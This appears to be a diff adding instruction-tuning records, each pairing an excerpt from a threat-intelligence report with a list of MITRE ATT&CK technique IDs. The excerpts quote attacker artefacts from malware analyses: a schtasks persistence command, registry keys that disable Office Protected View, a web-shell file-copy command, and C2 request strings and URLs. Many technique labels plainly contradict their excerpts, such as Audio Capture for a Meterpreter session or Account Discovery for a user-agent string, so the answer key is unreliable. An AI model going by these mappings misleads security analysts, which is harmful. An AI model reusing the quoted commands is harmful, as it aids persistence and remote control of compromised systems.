\\Users\\[user_name]\\Intel\\58d2a83f777908.23270411.vbs Also, the script creates a named schedule task for persistence to launch \u201c58d2a83f7778d5.36783181.vbs\u201d every 25 minutes", + "output": "- T1087: Account Discovery\n- T1036: Masquerading\n- T1204: User Execution\n- T1064: Scripting\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 26.\u00a0Communication with the C&C server after the exchange of OS packet info Meanwhile, the runHandle method of the main backdoor loop will call for the requestServer method with the following backdoor commands (each command has one byte long code and is extracted by Packet::getCommand): Figure 27.\u00a0The getCommand method The figure below shows the example of two of several possible command codes", + "output": "- T1008: Fallback Channels\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks In this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s \u201cSquiblydoo\u201d App Whitelisting bypass every 30 minutes", + "output": "- T1036: Masquerading\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 5: Sample pseudo-HTTP beacon The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command", + "output": "- T1071: Application Layer Protocol\n- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "File Indicators Samples Observed from Spear Phishing Messages Above Filename Chinas_Arctic_Dream.doc File Size 6587812 bytes MD5 598eeb6a18233023f3551097aa49b083 SHA1 e9a46966f93fe15c22636a5033c61c725add8fa5 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe", + "output": "- T1036: Masquerading\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Filename The_Four_Traps_for_China.doc File Size 4428595 bytes MD5 7659c41a30976d523bb0fbb8cde49094 SHA1 3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment", + "output": "- T1049: System Network Connections Discovery\n- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Finally, the Trojan creates a scheduled task to run itself every three minutes by running the following command on the command prompt after replacing the %path% string with the path to the srvResesponded.vbs VBScript:SchTasks /Create /SC MINUTE /MO 3 /TN \u201cInetlSecurityAssistManager\u201d /TR \u201cwscript %path%\u201d /f The Trojan uses HTTP to communicate with its C2 server, specifically using the InternetExplorer application object within an embedded Microsoft .NET Framework assembly called Interop.SHDocVw", + "output": "- T1071: Application Layer Protocol\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "First, the macro attempts to enable macros in multiple versions of Word, PowerPoint, Publisher and Excel by setting the following registry keys to the value of 1: HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings The macro also attempts to disable protections provided by the Protected View capability within Word, Excel, and PowerPoint by setting the following registry keys to a value of 1: HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV \u00a0 First Stage Payload The payload installed by the macro is a downloader Trojan written in VB.NET that downloads a secondary payload and decoy document", + "output": "- T1553.002: Subvert Trust Controls - Code Signing\n- T1027.001: Obfuscated Files or Information - Binary Padding\n- T1112: Modify Registry\n- T1005: Data from Local System\n- T1204: User Execution\n- T1518.001: Software Discovery - Security Software Discovery\n- T1598.002: Phishing for Information - Spearphishing Attachment\n- T1203: Exploitation for Client Execution\n- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Following these checks, it drops several more malware files signed with the pasted AMD digital signature to a directory it creates", + "output": "- T1553.002: Subvert Trust Controls - Code Signing\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For example, From (01-04 11-40-02).txt All the text files are now packed into the archive temp.zip (%temp%\\temp.zip) zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt txt is uploaded to the control server Additional Commands and Capabilities The service-based DLL implant traverses to the /htdocs/ directory on the FTP server and looks for any files with the keywords: TO EVERYONE: Commands issued to all infected endpoints TO : Commands issued to endpoints matching the ComputerName The following commands are supported by the malware implant: cmd /c pull : Adds filename to temp.zip, Base64 encodes, and uploads to control server cmd /c chip : Deletes current ipnet.ini config file", + "output": "- T1059: Command and Scripting Interpreter\n- T1560: Archive Collected Data\n- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For example, the following string would be included in one of the HTTP parameters sent to the C2 server: eRmaVsr90D-7Ig1ngV3PkdouzP974 In this specific case, the actor made a mistake when configuring this XAgent sample with its C2 locations", + "output": "- T1071: Application Layer Protocol\n- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For instance, here are the resulting decrypted strings from each of the case statements (dd7e69e1\u2026): Case \u2013 String decrypted 1 \u2013 185.25.50[.]93 2 \u2013 POST http://185.25.50[.]93/syshelp/kd8812u/protocol.php HTTP/1.1\\r\\nHost: 185.25.50[.]93\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: 3 \u2013 porg= 4 \u2013 Content-Length: The Trojan uses raw sockets to communicate with its C2 server and uses the decrypted string above to create HTTP requests", + "output": "- T1071: Application Layer Protocol\n- T1008: Fallback Channels\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For instance, the following data exists within a resource: fb 70 b0 c9 bd c5 8a d4 0c 54 fd 4c 6d bb f0 0f By multiplying each byte with -1, we obtain the following data: 05 90 50 37 43 3b 76 2c f4 ac 03 b4 93 45 10 f1 After using RC4 and the key 14331d289e737093994395d3fc412afc, the following cleartext data appears: \\x00\\x00\\x00\\x00FlashRun.vbs We do not see the payload using this FlashRun.vbs filename, instead it uses a temporary file name to store an embedded VBScript file, such as %Temp%\\4.tmp\\5.vbs", + "output": "- T1486: Data Encrypted for Impact\n- T1064: Scripting\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality", + "output": "- T1056: Input Capture\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "From those servers the threat actor could use a web shell to retrieve the encrypted archives: copy \\\\{FILE PATH}\\c$\\programdata\\*.tmp \\\\{FILE PATH}\\ServiceDesk\\custom\\style After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection", + "output": "- T1505.003: Server Software Component - Web Shell\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Function for scrambling AES256 key in the outgoing packet Some screenshots taken during scrambling and encryption process: Figure 21.\u00a0The highlighted bytes represent the scrambled computer info Figure 22.\u00a0Randomly generated AES256 key Figure 23.\u00a0Scrambled AES256 key (0xC1 XOR 0x13 = 0xD2, 0xD2 ROL 6 = 0xB4) etc.) Figure 24.\u00a0Computer info encrypted with AES256 key Figure 25.\u00a0Screenshot of the final payload to be sent to C&C server", + "output": "- T1573: Encrypted Channel\n- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gather the process time for all processes Getting time information for all processes running on the system", + "output": "- T1055: Process Injection\n- T1124: System Time Discovery\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Generate payloads in various formats: Format Architecture Short Name Android Package x86 & ARMv7 apk Linux Binary x86 lin_x86 Linux Binary x64 lin_x64 Linux Shared Object x86 so_x86 Linux Shared Object x64 so_x64 Windows PE Executable x86 exe_x86 Windows PE Executable x64 exe_x64 Windows DLL x86 dll_x86 Windows DLL x64 dll_x64 Python Script x86 & x64 py PyInstaller x86 & x64 pyinst Python Oneliner x86 & x64 py_oneliner Powershell x86 & x64 ps1 Powershell Oneliner x86 & x64 ps1_oneliner Ducky Script N/A rubber_ducky Deploy in memory from a single command line using python or powershell one-liners", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1106: Native API\n- T1010: Application Window Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Get-Process | select Company Checks to see if any running processes have \u201cWireshark\u201d or \u201cSysinternals\u201d as the company name", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Having a Meterpreter session on a compromised computer allows for full control of the computer and exfiltration of any data, and in some cases lateral movement inside the organization", + "output": "- T1132: Data Encoding\n- T1123: Audio Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Here is the content of the file: /shellcode <90909090909090909090E800<...redacted\u2026>4D2D6DC95CBD5DC1811111111111111> def <7B0D0A2756...redacted\u2026>312067657420636C6F736566696C650D0A717569740D0A7D> token pop exch pop Exec The executed shellcode will first perform a decoding routine designed to download an additional payload from the internet", + "output": "- T1064: Scripting\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "High Commissioner of Bangladesh Pakistan eying Sukhoi-35 fighter planes as part of defense deal from Russia 2018.143 PG COURSE IN 2018-2021 BATCH India Bangladesh and Pakistan Press Release on Observance of Historic Mujibnogor Dibosh by Pakistan Mission on 17 April 2018 Afghan Bomb Blast report by ISI USAJOBS Daily Saved Search Results for New GS15 for 3/30/2018 How Rigging take place in Senate Elections in Pakistan Afghan Terrorist group details ISI Restricted113 1971 Liberation War Freedom Fighters in Pakistan Army Custody Database Additionally, the following filenames were witnessed in these attacks (spelling and grammar mistakes included): Liberation Freedom Fighter.xlam NSC details of participants.xlam Raw Sect Vikram report on Pak Army Confidential.doc USA Immagration Policy for Families.ppam doc CV FM.doc doc Sukhoi35 deal report.doc Nominal Roll.doc Press Release 17 April.doc Afghan Blast report by ISI.doc Rigging in Pakistan Senate.doc Afghan Terrorist group report.doc \u00a0 The payloads for these attacks varied in malware family", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hook module structure After decrypting the strings, it became clear that the Linux Hook main module communicated with the same CnC server as other Windows modules: The CNC\u2019s IP address in the Linux module This Linux module can process the following commands, some of which are similar to the Windows version: die delete all BlackEnergy2 files and system traces kill delete all BlackEnergy2 files and system traces and reboot lexec launch a command using bin/sh rexec download and launch file using \u2018fork/exec\u2019 update rewrite self file migrate update the CnC server Windows Plugins After the disclosure of an unusual CnC server that pushed Linux and the new Windows plugins we paid greater\u00a0attention to new BE2 samples and associated CnCs", + "output": "- T1106: Native API\n- T1105: Ingress Tool Transfer\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "However, if you DO get infected, you\u2019ll want to delete the following registry keys (if they exist): HKLM/System/CurrentControlSet/Services/DirecastX ytasda jrqq HKLM/System/CurrentControlSet/Services/DirectX yta jsdrq HKLM/System/CurrentControlSet/Services/DirectX ytsda jrq Additionally, you\u2019ll want to delete any copies of \u201csvchost.exe\u201d that you find in %Program Files (x86)%/DIFXE/, as these are the dropped copies of the malware", + "output": "- T1112: Modify Registry\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "However, we were able determine a unique, hard-coded user agent used for the C2 communications: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1) Using AutoFocus, we pivoted from the user agent string to expand our data set to three additional Zebrocy samples using the exact same user agent", + "output": "- T1087: Account Discovery\n- T1543.001: Create or Modify System Process - Launch Agent" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If that fails, the payload will use DNS tunneling by first issuing a DNS query to resolve the following domain to notify the C2 that the payload will send data to it in subsequent DNS queries: \u00a0 ns1.. \u00a0 The payload will then split the message up into 60-byte chunks (only 1 in this case), which it will send to the C2 via DNS queries to resolve domains structured as: \u00a0 .. \u00a0 The payload will notify the C2 that it is done sending data by issuing a DNS query to resolve a domain structured as: \u00a0 ns2.. \u00a0 Package Comparison of the QUADAGENT Samples The bat2exe version (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63)has a batch script, PowerShell script, and associated file names embedded within several resources that it will decrypt using RC4 and various MD5 hashes for keys", + "output": "- T1048: Exfiltration Over Alternative Protocol\n- T1573: Encrypted Channel\n- T1071: Application Layer Protocol\n- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what\u00a0 commands the C2 wishes to run by issuing a request to the following URL:http:///what? After issuing the what command, the Trojan will parse the C2\u2019s response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit", + "output": "- T1573: Encrypted Channel\n- T1043: Commonly Used Port\n- T1571: Non-Standard Port\n- T1008: Fallback Channels\n- T1071: Application Layer Protocol\n- T1132: Data Encoding\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the mutex does not exist and a Windows Startup Registry key with name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by: Copying itself to the path %PROGRAMDATA%\\svchost.exe Sets the Windows Startup Registry key with the name \u201cSystem Update\u201d which points to the above dropped payload", + "output": "- T1112: Modify Registry\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If there are keys for the string encryption with the XOR algorithm, the configuration data will be also encrypted with the XOR algorithm", + "output": "- T1573: Encrypted Channel\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the Trojan receives this echo, it will create the following file that the Trojan uses as a signal that it was able to successfully communicate with its C2 server: %APPDATA%\\Windows\\ShwDoc.srv If the Trojan determines the C2 server wishes to send a command, it sends an HTTP request to the following URL: hxxp://www.windowspatch[.]com/tahw? The Trojan will first check the response to this request for the string spoo, which signifies the C2 does not wish to issue a command", + "output": "- T1071: Application Layer Protocol\n- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern: \u00a0[a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com VBScript #2 \u201cmshta.exe\u201d further executes the second VBScript \u201c58d2a83f777908.23270411.vbs\u201d, which creates a folder by GUID name inside \u201cIntel\u201d and drops the VBScript payloads and configuration files: \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777638.60220156.ini \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777688.78384945.ps1 \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776b5.64953395.txt \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776e0.72726761.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777716.48248237.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777788.86541308.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\Foxconn.lnk This script then executes \u201c58d2a83f777716.48248237.vbs\u201d, which is a variant of FIN7\u2019s HALFBAKED backdoor", + "output": "- T1064: Scripting\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In 2016, CTU researchers observed the group using native system functionality to disable logging processes and delete logs within a compromised environment", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In all of the DropIt samples we collected, the dropper will then save the executable to the user\u2019s %TEMP% folder and execute the file, specifically to one of the following filenames: %TEMP%\\spp.exe %TEMP%\\sloo.exe %TEMP%\\spoo.exe %TEMP%\\vschos.exe We have also seen Magic Hound using DropIt like a binder Trojan, specifically dropping a legitimate decoy executable along with the malicious executable as a payload", + "output": "- T1055.012: Process Injection - Process Hollowing\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and 